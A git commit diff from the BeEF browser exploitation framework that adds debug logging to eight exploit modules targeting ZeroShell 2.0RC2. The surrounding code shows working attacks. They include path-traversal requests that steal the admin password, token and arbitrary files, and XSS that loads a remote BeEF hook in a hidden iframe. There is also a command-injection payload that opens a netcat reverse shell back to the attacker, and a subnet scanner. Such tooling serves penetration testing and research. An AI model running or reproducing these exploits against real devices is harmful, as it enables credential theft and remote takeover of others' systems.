Add some beef.debug() in all ZeroShell's modules

2016-10-06 13:47:19 +02:00
parent 528e00bf6e
commit f8afc3e326
8 changed files with 12 additions and 0 deletions
--- a/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_dynamic_token/command.js
+++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_dynamic_token/command.js
@@ -14,10 +14,12 @@ beef.execute(function() {
 	var pwd = "";
 	var token = "";

+	beef.debug("[ZeroShell_2.0RC2_admin_dynamic_token] Trying to retrieve admin password in plaintext: " + uripwd);
 	beef.net.forge_request("http", "GET", rhost, rport, uripwd, null, null, null, 10, 'script', true, null, function(response1){
 		if(response1.status_code == 200){
 			pwd = response1.response_body.trim();
 			beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Admin password retrieved : " + pwd, beef.are.status_success());
+			beef.debug("[ZeroShell_2.0RC2_admin_dynamic_token] Trying to authenticate admin user to gain dynamic token with password: " + pwd);
 			beef.net.forge_request("http", "POST", rhost, rport, uri, true, null, { Action: "StartSessionSubmit", User: "admin", PW: pwd }, 10, 'script', false, null, function(response2){
 				if(response2.status_code == 200){
 					token = response2.response_body.substr(response2.response_body.indexOf("STk=")+4, 40);
--- a/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_password/command.js
+++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_password/command.js
@@ -10,6 +10,7 @@ beef.execute(function() {

  var uri = "http://" + rhost + ":" + rport + "/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=../../../var/register/system/ldap/rootpw";

+  beef.debug("[ZeroShell_2.0RC2_admin_password] Trying to retrieve admin password in plaintext: " + uri);
  beef.net.forge_request("http", "GET", rhost, rport, uri, null, null, null, 10, 'script', true, null, function(response){
    if(response.status_code == 200){
      beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: ZeroShell admin password : [" + response.response_body + "]", beef.are.status_success());
--- a/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_static_token/command.js
+++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_admin_static_token/command.js
@@ -10,6 +10,7 @@ beef.execute(function() {

  var uri = "http://" + rhost + ":" + rport + "/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=../../../tmp/STk_Admin";

+  beef.debug("[ZeroShell_2.0RC2_admin_static_token] Trying to retrieve admin static token: " + uri);
  beef.net.forge_request("http", "GET", rhost, rport, uri, null, null, null, 10, 'script', true, null, function(response){
    if(response.status_code == 200){
      beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: ZeroShell admin static token : [" + response.response_body + "]", beef.are.status_success());
--- a/modules/exploits/zeroshell/zeroshell_2_0rc2_file_disclosure/command.js
+++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_file_disclosure/command.js
@@ -11,6 +11,7 @@ beef.execute(function() {

  var uri = "http://" + rhost + ":" + rport + "/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=../../../" + rfile;

+  beef.debug("[ZeroShell_2.0RC2_file_disclosure] Trying to retrieve local file: " + uri);
  beef.net.forge_request("http", "GET", rhost, rport, uri, null, null, null, 10, 'script', true, null, function(response){
    if(response.status_code == 200){
      beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: ZeroShell file [" + rfile + "] content : [" + response.response_body + "]", beef.are.status_success());
--- a/modules/exploits/zeroshell/zeroshell_2_0rc2_migrate_hook/command.js
+++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_migrate_hook/command.js
@@ -11,6 +11,7 @@ beef.execute(function() {

 	var target = "http://" + rhost + ":" + rport +"/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=x<script src='" + hook + "'></script>";

+	beef.debug("[ZeroShell_2.0RC2_migrate_hook] Trying to retrieve migrate BeEF hook in ZeroShell context: " + target);
 	var iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();
 	iframe_<%= @command_id %>.setAttribute('src', target);

--- a/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop/command.js
+++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop/command.js
@@ -17,14 +17,17 @@ beef.execute(function() {
 	var token = "";
 	var payload = 'beef" localhost && rm -f /tmp/x;mkfifo /tmp/x;cat /tmp/x|/bin/sh -i 2>&1|nc ' + lhost + ' ' + lport + ' > /tmp/x #';

+	beef.debug("[ZeroShell_2.0RC2_reverse_shell_csrf_sop] Trying to retrieve admin password in plaintext: " + uripwd);
 	beef.net.forge_request("http", "GET", rhost, rport, uripwd, null, null, null, 10, 'script', true, null, function(response1){
 		if(response1.status_code == 200){
 			pwd = response1.response_body.trim();
 			beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Admin password retrieved : " + pwd, beef.are.status_success());
+			beef.debug("[ZeroShell_2.0RC2_reverse_shell_csrf_sop] Trying to authenticate admin user to gain dynamic token with password: " + pwd);
 			beef.net.forge_request("http", "POST", rhost, rport, uri, true, null, { Action: "StartSessionSubmit", User: "admin", PW: pwd }, 10, 'script', false, null, function(response2){
 				if(response2.status_code == 200){
 					token = response2.response_body.substr(response2.response_body.indexOf("STk=")+4, 40);
 					beef.net.send("<%= @command_url %>", <%= @command_id %>,"result=OK: Admin token retrieved : " + token, beef.are.status_success());
+					beef.debug("[ZeroShell_2.0RC2_reverse_shell_csrf_sop] Trying to spawn a reverse-shell via CSRF in ZeroShell SOP context.");
 					beef.net.forge_request("http", "POST", rhost, rport, uri, true, null, { 
 						Action: "Lookup",
 						Section: "DNS",
--- a/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass/command.js
+++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_reverse_shell_csrf_sop_bypass/command.js
@@ -12,6 +12,8 @@ beef.execute(function() {
 	var hook = beef.net.httpproto + "://" + beef.net.host + ":" + beef.net.port + "/x.js";

 	var target = "http://" + rhost + ":" + rport +"/cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=x<script src='" + hook + "'></script>#lhost=" + lhost + "&lport=" + lport;
+
+	beef.debug("[ZeroShell_2.0RC2_reverse_shell_csrf_sop_bypass] Trying to spawn a reverse-shell via XSS/CSRF in ZeroShell with SOP bypass.");
 	var iframe_<%= @command_id %> = beef.dom.createInvisibleIframe();
 	iframe_<%= @command_id %>.setAttribute('src', target);

--- a/modules/exploits/zeroshell/zeroshell_2_0rc2_scanner/command.js
+++ b/modules/exploits/zeroshell/zeroshell_2_0rc2_scanner/command.js
@@ -81,6 +81,7 @@ beef.execute(function() {
 	scan = function(){
 		var i = 0; // Counter compared to IP bloc size
 		var ip_from_long_bloc = ip_from_long; // Save the begining IPv4 address for the current bloc
+		beef.debug("[ZeroShell_2.0RC2_scanner] Scan the subnet block from " + long2ip(ip_from_long) + " to " + long2ip(ip_to_long) + ".");
 		while((ip_from_long <= ip_to_long) && (i < ip_bloc)){
 			var img = document.createElement('img');
 			var ip = long2ip(ip_from_long);